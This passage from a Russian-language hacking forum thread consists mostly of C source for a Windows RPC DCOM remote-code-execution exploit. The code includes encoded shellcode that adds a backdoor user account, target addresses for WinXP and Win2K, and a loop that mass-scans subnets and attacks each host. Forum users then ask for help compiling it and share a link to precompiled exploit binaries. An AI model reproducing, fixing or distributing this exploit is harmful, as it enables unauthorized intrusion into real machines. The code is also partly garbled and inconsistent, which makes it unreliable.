,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00 }; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00 ,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00 ,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00 }; void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) { for(int i=offset;i<(offset+lenght);i++) buf[i]=buf[i]^mask; } DWORD GETSTRCS(char *buf) { DWORD cs=0; bool cld=false; for(unsigned int i=0;i<strlen(buf);i++) { for(int z=0;z<13;z++) { if(cs&1) cld=true; cs=cs>>1; if(cld) cs=cs|0x80000000; cld=false; } cs+=buf[i]; } return cs; } struct { DWORD seh; DWORD jmp; DWORD heap; char target[200]; } target_os[]= { { 0x005Bfd2c, 0x00081eeb, 0x00180000, "WinXP" }, { 0x0095fd3c, 0x00081eeb, 0x00170000, "Win2K" } },v; unsigned char rawData1[]= "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\ x00" "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\ x5C\x00" "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\ x46\x00\x38\x6e" "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\ x1b\x8d\xa0\x01" "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\ x99\x01\x80\x30" "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\ xf2\xe1\xea\xd2" //SHELLCODE From SAM ,THANKs ! //Add user SST,password is 557, "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\ x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\ x99\x99\x12\x6D" "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\ x13\x97\x71\x3C" "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\ xEA\x71\x0F\x99" "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\ xD9\xA9\x14\xD9" "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\ xFD\xF1\xB9\xB6" "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\ xF1\xF7\xFC\xED" "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\ xB9\xAC\xAC\xAE" "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\ xFC\xED\xB9\x12" "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\ x99\x99\xF1\xED" "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\ xEB\xF1\xF0\xEA" "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\ xF1\xF5\xFE\xEB" "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\ x55\xC9\xC8\x66" "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\ x12\xF5\xBD\x81" "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\ x12\xC3\xB9\x9A" "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\ xAA\x59\x35\xA3" "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\ xBD\x8D\xEC\x78" "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\ x9A\x44\x12\x9D" "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\ xC2\x5B\x9D\x99" "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\ x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\ x31\x21\x99\x99" "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\ x66" "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\ xce\xaf\x1a\xce" "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\ xd6\xd7\xc3\xc6" "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\ x77\x6c\xe6\xd7" "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\ x6b\xc3\x6c\xc4" "\x7f\x19\x95\xd5\x17\x53\xe6\x6a" "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\ x90" // "\x90\x90\x90\x90\x90\x90\x90\x90" "\x77\xe0\x43\x00\x00\x10\x5c\x00" "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26 "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic //"Utilization of released heap structure and exploit of universal Heap overflow in windows ". "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\ x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\ xBD\x9D\xC9\x14" "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\ x99\x99\xC9\xAA" "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\ x99\xC9\x66\xCF" "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\ xAC\x99\xAE\x99" "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\ x99\xEA\x99\xF1" "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\ xB9\x99\xF1\xF7" "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\ x29\x99\x99\x99" "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\ xC9\xC9\xC9\xCA" "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\ xC0\xAA\x59\xC9" "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\ x99\xB9\x99\xF1" "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\ xEB\x99\xF1\xF8" "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\ x99\xF1\xF0\x99" "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\ xF1\xEC\x99\xE9" "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\ xFA\x99\xF8\x99" "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\ x99\xFC\x99\x12" "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\ x1D\xBD\x91\x98" "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\ xBD\xB1\x98\x99" "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\ xCC\xCF\xCE\x12" "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\ x12\xD3\x81\x12" "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\ xAA\x66\x65\xAA" "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\ x6B\xA2\xE5\xBD" "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\ x12\xC3\x85\x9A" "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\ xC6\xC7\xC4\xC2" "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\ x59\xE1\x95\x12" "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\ xD9\xAD\x12\x31" "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\ xEC\x64\x66\x66" "\x04\x04\x00\x70\x00\x04\x40" "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\ xa0\x04\x00" "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71" ; int version(char ip[16], int sock) { //un poco de ettercap... unsigned char peer0_0[] = { 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 }; unsigned char peer0_1[] = { 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00 }; /* unsigned char win2kvuln[] = { 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00}; */ fd_set fds2; unsigned char buf[1024]; int l; struct timeval tv2; FD_ZERO(&fds2); FD_SET(sock, &fds2); tv2.tv_sec = 6; tv2.tv_usec = 0; memset(buf,'\0',sizeof(buf)); send(sock,(char *)peer0_0,sizeof(peer0_0),0); if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) { l=recv (sock, (char *)buf, sizeof (buf),0); // for(i=0;i<52;i++) // { // if (i==28) i=i+4; // if (buf[i+32]!=win2kvuln) // { send(sock,(const char *)peer0_1,sizeof(peer0_1),0); if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) { memset(buf,'\0',sizeof(buf)); l=recv (sock, (char *)buf, sizeof (buf),0); if (l==32) { closesocket(sock); return(1);//winxp } else { #ifdef WIN32 closesocket(sock); #else close(sock); #endif return(0);//win2kby default. Nt4 not added.. } } else return(-1); // } //} // closesocket(sock); // return(0);//win2k } closesocket(sock); return(-1); //Unknown } /************************************************** ******************************/ int attack(char *ip1,bool atack) { unsigned char rawData[1036]; memcpy(rawData,rawData1,1036); unsigned char shellcode[50000]; char ip[200]; strcpy(ip,ip1); WSADATA WSAData; SOCKET sock; int len,len1; SOCKADDR_IN addr_in; short port=135; unsigned char buf1[50000]; unsigned char buf2[50000]; printf("%s\n",ip); //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); //printf("Code by FlashSky,Flashsky xfocus org\n"); //printf("Welcome to our Site: http://www.xfocus.org\n"); //printf("Welcome to our Site: http://www.venustech.com.cn\n"); /* if(argc!=3) { printf("%s targetIP targetOS\ntargets:\n",argv[0]); for(int i=0;i<sizeof(target_os)/sizeof(v);i++) printf("%d - %s\n",i,target_os.target); printf("\n%x\n",GETSTRCS(argv[1])); return; } */ /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:%d\n",WSAGetLastError()); return; } */ addr_in.sin_family=AF_INET; addr_in.sin_port=htons(port); addr_in.sin_addr.S_un.S_addr=inet_addr(ip); if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET) { printf("Socket failed.Error:%d\n",WSAGetLastError()); return 0; } len1=sizeof(request1); len=sizeof(rawData); if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==S OCKET_ERROR) { printf("%s - connect failed\n",ip); return 0; } int vers=!version(ip,sock); // printf("%d\n",vers); // return; // int vers=1; FILE *fp; //?? ?? ? ??? // fp=fopen("shellcode","rb"); // fread(rawData,1,1036,fp); // fclose(fp); //???? ??? ???? ?? ??????????? ?????? ?????! fp=fopen("bshell2","rb"); int sz=fread(shellcode,1,1024,fp); fclose(fp); // printf("%d\n",sz); for(int i=0;i<sz;i++) rawData[i+0x71]=shellcode[i]; // fp=fopen("badfile.exe","rb"); // unsigned int sz1=fread(shellcode,1,50000,fp); // fclose(fp); // for(i=0;i<sz1;i++) // rawData[i+0x240]=shellcode; // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); // return; //??? ? ? ? ????? ? ??? ??? ???????? HEAP'a // DWORD heap=0x00180000; // int k=vers; // vers=1; // *(DWORD *)(rawData+0xae)=target_os[vers].heap; *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; //?????? ??? ?????? ? ? ???, ??? ?? ??? ??????? ??? ? XOR(rawData,0x71,sz,0x99); // XOR(rawData,0x240,sz1,0x99); //? ? ?? ? ? ??? ? ??? ?? ??? ? ? SEH ? JMP DWORD seh=target_os[vers].seh; DWORD jmp=target_os[vers].jmp; *(DWORD *)(rawData+0x22a)=jmp; *(DWORD *)(rawData+0x22e)=seh; // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); *(WORD *)(rawData+0x62)=sz; memcpy(buf2,request1,sizeof(request1)); *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,rawData,sizeof(rawData)); len1=len1+sizeof(rawData); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; closesocket(sock); if(atack) { sock=socket(2,1,0); WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) { printf("%s - send failed %d\n",ip,WSAGetLastError()); return 0; } else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} len=recv(sock,(char *)buf1,1000,NULL); bool ft=1; if(ft) { int i=0; while(1) { if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) { printf("\nSend failed.Error:%d\n",WSAGetLastError()); return 0; } else { printf("\r%d",++i); } //Sleep(1000); } } send(sock,(const char *)buf2,len1,0); closesocket(sock); } else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); // fp=fopen("pac","wb"); // fwrite(rawData,1,1036,fp); // fclose(fp); } unsigned long thread_count=0; char adr[200]; DWORD WINAPI ThreadProc( LPVOID lpParameter // thread data ) { thread_count++; attack(adr,0); thread_count--; return 0; } int main(int argc,char ** argv) { //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1])); //return; //HFILE hf=_lopen("asd123",0x1001); //printf("%x",hf); //_lclose(hf); //return; if(argc!=2){ fprintf(stderr, "RPC universal exploit. Exploit MS09-039 vulnerability\n" "unpatched host - to codee xecution\n" "patched host - to DoS\n" "based on original XFocus RPCDCOM2 exploit\n" "modification and shellcode (c) by karlss0n\n" "downloaded on www.k-otik.com\n" "\n" "usage: %s <target_ip>\n", argv[0]); return 10; } WSADATA wsaData; int wVersionRequested; wVersionRequested = MAKEWORD( 2, 2 ); int err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { /* Tell the user that we could not find a usable */ /* WinSock DLL. */ return 1; } if(strchr(argv[1],'.')) { attack(argv[1],1); Sleep(20000); return 2; } int cb=1,db=1; cb=atoi(argv[3]); db=atoi(argv[4]); long tm=atoi(argv[5]); for(int c=cb;c<255;c++) { for(int d=db;d<255;d++) { sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d); if(thread_count>tm) while(thread_count>tm) Sleep(100); CreateThread(NULL,0,&ThreadProc,(void *)"",0,NULL); Sleep(10); fflush(fp1); } } Sleep(60000); fclose(fp1); return 0; } // milw0rm.com [2003-10-09] ----------------------------------------------- этот скомпилился, но када запускаешь выдаёт следующее: без ввода параметров C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор \Рабочий стол\sploit.exe" RPC universal exploit. Exploit MS09-039 vulnerability unpatched host - to codee xecution patched host - to DoS based on original XFocus RPCDCOM2 exploit modification and shellcode (c) by karlss0n downloaded on www.k-otik.com usage: C:\Documents and Settings\└фьшэшёЄЁрЄюЁ\╨рсюўшщ ёЄюы\sploit.exe <target_i p> с вводом параметра (*.*.*.* - ip жертвы) C:\Documents and Settings\Администратор>"C:\Documents and Settings\Администратор \Рабочий стол\sploit.exe" *.*.*.* *.*.*.* C:\Documents and Settings\Администратор> вопщем помогите кто чем может ссылки на милворм: 1 сплоит http://milw0rm.com/exploits/103 2 сплоит http://milw0rm.com/exploits/109 |
4ем компилишь? я http://milw0rm.com/exploits/103 скомпилил в Visual норм!
|
На оба сплоента скомпиленых
http://www.sendspace.com/file/z0frfs |
мде, лаконично...
|
| Время: 12:22 |